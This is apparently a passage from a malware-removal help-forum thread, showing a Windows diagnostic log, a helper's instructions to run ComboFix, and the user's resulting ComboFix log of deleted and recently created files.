MSCONFIG\startupreg: Amazon Cloud Player => "C:\Users\Ric\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\Ric\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: AOL Fast Start => "C:\Program Files (x86)\AOL Desktop 9.7a\AOL.EXE" -b
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: CanonQuickMenu => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
MSCONFIG\startupreg: Carbonite Backup => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe
MSCONFIG\startupreg: CMCService => "C:\Program Files (x86)\ATI\Catalyst Media Center\CMCService.exe"
MSCONFIG\startupreg: CPMonitor => "C:\Program Files (x86)\Roxio 2011\5.0\CPMonitor.exe"
MSCONFIG\startupreg: Dell Webcam Central => "C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
MSCONFIG\startupreg: DellSystemDetect => C:\Users\Ric\AppData\Local\Apps\2.0\KV0A55O0.XOG\GVHOPR7A.3VW\dell..tion_0f612f649c4a10af_0005.0008_a4204ff54ae5d3ac\DellSystemDetect.exe
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio 2011\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: dldtamon => "C:\Program Files (x86)\Dell V305\dldtamon.exe"
MSCONFIG\startupreg: dldtmon.exe => "C:\Program Files (x86)\Dell V305\dldtmon.exe"
MSCONFIG\startupreg: dleamon.exe => "C:\Program Files (x86)\Dell V310-V510 Series\dleamon.exe"
MSCONFIG\startupreg: eFax 4.4 => "C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe" /R
MSCONFIG\startupreg: EvtMgr6 => C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
MSCONFIG\startupreg: EzPrint => "C:\Program Files (x86)\Dell V310-V510 Series\ezprint.exe"
MSCONFIG\startupreg: Fitbit Connect => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
MSCONFIG\startupreg: Google Update => "C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: Google+ Auto Backup => "C:\Users\Ric\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart
MSCONFIG\startupreg: HostManager => C:\Program Files (x86)\Common Files\AOL\1298744002\ee\AOLSoftware.exe
MSCONFIG\startupreg: IAAnotif => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iCloudServices => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
MSCONFIG\startupreg: IJNetworkScannerSelectorEX => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: MobileDocuments => C:\Program Files (x86)\Common Files\Apple\Internet Services\ubd.exe
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: QuickSet => C:\Program Files\Dell\QuickSet\QuickSet.exe
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatchTray13.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: SysTrayApp => C:\Program Files\IDT\WDM\sttray64.exe
MSCONFIG\startupreg: WirelessManager => C:\Program Files (x86)\Dell\Dell Mobile Broadband Manager\WirelessManager.exe

==================== Faulty Device Manager Devices =============

Name: Bluetooth Peripheral Device
Description: Bluetooth Peripheral Device
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth Peripheral Device
Description: Bluetooth Peripheral Device
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

System errors:
=============
Error: (07/16/2014 10:42:08 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/16/2014 10:41:56 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Error: (07/16/2014 10:41:55 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Roxio Hard Drive Watcher 12 service to connect.

Error: (07/16/2014 09:16:52 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/16/2014 09:16:31 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Error: (07/16/2014 09:16:28 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Roxio Hard Drive Watcher 12 service to connect.

Error: (07/15/2014 11:19:57 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (07/15/2014 11:19:57 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (07/15/2014 02:44:16 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/15/2014 02:44:04 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
xnvdb

Microsoft Office Sessions:
=========================
Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 10:46:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 09:23:41 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/16/2014 09:21:00 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/15/2014 02:48:08 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (07/15/2014 02:10:57 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

CodeIntegrity Errors:
===================================
  Date: 2013-10-10 08:31:39.527
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.521
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.515
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:31:39.509
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.543
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.537
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.534
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-10-10 08:18:00.530
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-08-26 09:10:28.073
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2013-08-26 09:10:28.058
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Common Files\McAfee\VSCore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Percentage of memory in use: 69%
Total physical RAM: 8180.5 MB
Available physical RAM: 2477.18 MB
Total Pagefile: 16359.18 MB
Available Pagefile: 8378.18 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:448.14 GB) (Free:268.73 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 466 GB) (Disk ID: 78DBB486)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=18 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=448 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 aharonov

  • Malware Response Team
  • 2,441 posts

Posted 16 July 2014 - 03:26 PM

Ok.


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 scooter2028

  • Topic Starter

  • Members
  • 15 posts

Posted 16 July 2014 - 09:28 PM

Attached is the ComboFix log.

 

I ran this differently than the requested runs before. After downloading the executable, I shut the system down, unplugged the network and rebooted. Then I ran ComboFix.exe.

The 'COM Surrogate' processes do not start when the system is not connected to the network and never has been during that uptime.

This means that ComboFix.exe would not be interfered with during execution, but it also means that it would not 'witness' the problem I'm having. Log below.

Should I try to run it with those nasty 'COM Surrogates'?

ComboFix 14-07-16.02 - Ric 07/16/2014  19:52:14.1.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6559 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\install.exe
c:\programdata\PCDr\6426\AddOnDownloaded\073fb38f-0e69-479d-bca1-4f81ec9dcbf6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0bb0beb6-da93-477d-980d-15bb6e2df09c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0d06f79c-d0e6-4610-9a2b-d8f1a48f4252.dll
c:\programdata\PCDr\6426\AddOnDownloaded\0d461521-7dbf-4cec-a29e-936c88cdf8c9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\100c3865-0c76-461b-b2fd-042d6d5fa7f6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\173c4dd2-e93c-4725-b006-db1d8f465192.dll
c:\programdata\PCDr\6426\AddOnDownloaded\1b0b3c38-2b97-4f8d-954b-06296209b73d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\1e0aaf9a-9947-4a7b-b1ae-8a89919438ed.dll
c:\programdata\PCDr\6426\AddOnDownloaded\263d6ac9-4f87-466c-947c-bd9af71d7035.dll
c:\programdata\PCDr\6426\AddOnDownloaded\2a6b5d0b-a2fc-4bdd-b3fe-6bbefb85b7e4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\2eccd5d6-e118-4f76-97b6-ba56fb6c597a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3410f47b-5e8c-47c6-bf2c-234af4121d4c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\378deb7f-049e-4a5e-83b2-5381dcd9e928.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3972fea3-214c-4935-a7d1-96bf66115683.dll
c:\programdata\PCDr\6426\AddOnDownloaded\3b1c7acd-5e3e-4459-ab98-5109117e2341.dll
c:\programdata\PCDr\6426\AddOnDownloaded\434373b7-17f4-4a5e-9e8f-2c1bb65cd9e5.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4546f2bc-b9d9-4667-abe7-b0bacc90279e.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4804ced5-915b-48a3-a465-b8a5e02714bf.dll
c:\programdata\PCDr\6426\AddOnDownloaded\4818e109-9489-4cd8-9044-44defd8ec187.dll
c:\programdata\PCDr\6426\AddOnDownloaded\50441041-9037-4c34-842c-4a8523e700da.dll
c:\programdata\PCDr\6426\AddOnDownloaded\51fdf16e-ecb9-4fa4-8469-76fc9a22293b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\57d7325c-8462-4866-a9ca-3f9228775fed.dll
c:\programdata\PCDr\6426\AddOnDownloaded\59be3af2-87f2-4d3a-b380-7509f3d47c40.dll
c:\programdata\PCDr\6426\AddOnDownloaded\62d1f0b0-bc9a-4f6c-bad7-93b19a91276a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\64882123-3c6f-4e15-8579-c6d1ba56c9de.dll
c:\programdata\PCDr\6426\AddOnDownloaded\67c3d4fe-b638-467a-9fe2-c5813ade3330.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6820b110-e483-4f1e-9b48-438f7916f078.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6b5978fa-48d7-4309-a523-7e157768c0d8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\6f4fb483-ce30-493a-8cb4-3e530ab1be5b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\739db3eb-d3cd-4c86-a6ea-01a49984fa3b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7bd83798-7a02-4f50-83a2-b91cabcbd1f9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7bd91bf5-79bd-4c68-b85b-3c132cdb258a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\7dbfef1a-6148-4748-a1b3-71627763a45a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\813755dc-2229-47a2-b85b-19d0aaa641c9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\872965c7-08b7-47fc-a74c-ff167590b71a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\8745715d-dc8a-4b32-b6a6-89cd3d0cc3c5.dll
c:\programdata\PCDr\6426\AddOnDownloaded\8d357f17-07ad-4392-ba06-fb67564c98cd.dll
c:\programdata\PCDr\6426\AddOnDownloaded\934f6059-2d35-4bd9-a130-a17cb5563507.dll
c:\programdata\PCDr\6426\AddOnDownloaded\9c07cc30-4011-4e36-a63d-e59077a22429.dll
c:\programdata\PCDr\6426\AddOnDownloaded\a61f44a8-21a3-4c4a-a04b-993dfb73bf96.dll
c:\programdata\PCDr\6426\AddOnDownloaded\a9de0c84-9a7c-4638-9653-13aa8cf56e80.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ad817bdc-639c-43e8-b06b-897bcb5b8f23.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ae67b364-b69e-471e-b177-2459120b84d4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\aeffdb78-a789-4b6a-b2c2-f85f9b4863e6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\b2152f30-7380-4987-8fcf-e4c06952615d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\b4cc2a4a-87f5-49cd-935c-18f1a80e65b7.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ba005e12-3139-4327-9f7a-9f2ea6a6c841.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bc1b45ef-7c18-4b8a-95cd-f77c43d4f7df.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bc6fc708-5b6b-4a72-b336-09b3089baa7a.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bea3f575-677a-4c92-89ca-7be8480c11a9.dll
c:\programdata\PCDr\6426\AddOnDownloaded\bf647bd7-dfb5-4746-a6b4-b7c2fdbbf3b1.dll
c:\programdata\PCDr\6426\AddOnDownloaded\c4211805-b43b-471d-81af-4e0589f8607b.dll
c:\programdata\PCDr\6426\AddOnDownloaded\c6bf01ba-05a7-4930-b8dd-7c5fd03e97ac.dll
c:\programdata\PCDr\6426\AddOnDownloaded\cdda52ec-6ccd-425a-8c72-b7bbdc8b3acd.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d114d5a6-2ec4-4056-a365-d6281d97c6b6.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d1f4dc82-bc4c-4916-b37c-3ab9c30ae468.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d34c0cf7-889f-43dd-9283-b2b6f442aae3.dll
c:\programdata\PCDr\6426\AddOnDownloaded\d460bca3-24f0-49a7-beed-a064fad82750.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ddb9fe5d-525c-4d5d-ac37-0bd10f2864f8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\dfc97e68-74cd-4807-807f-ac146d81ec5d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e0db530c-27fc-4e55-af38-073796a09e9d.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e45cd45a-4d7c-4802-881f-74582b847e5c.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e5847967-7dc8-4833-8ca6-09af078c1bcb.dll
c:\programdata\PCDr\6426\AddOnDownloaded\e5a71f43-c979-4b3d-a544-9ed1dc6dc4c8.dll
c:\programdata\PCDr\6426\AddOnDownloaded\ef78c3e8-1d94-4219-8070-7617e119bba4.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f06c5597-1a85-4d1f-ac16-a6fdd2a6bedc.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f12de547-df4d-4236-9129-baac054f90ab.dll
c:\programdata\PCDr\6426\AddOnDownloaded\f9dc840b-c6f7-42a5-acec-50cc7a2827fd.dll
c:\users\Ric\AppData\Roaming\3C140A
c:\users\Ric\Documents\~WRL0001.tmp
c:\users\Ric\Documents\~WRL0002.tmp
c:\users\Ric\Documents\~WRL0005.tmp
c:\users\Ric\Documents\~WRL2938.tmp
c:\users\Ric\GoToAssistDownloadHelper.exe
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 00:04 . 2014-07-17 00:04 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-16 15:13 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
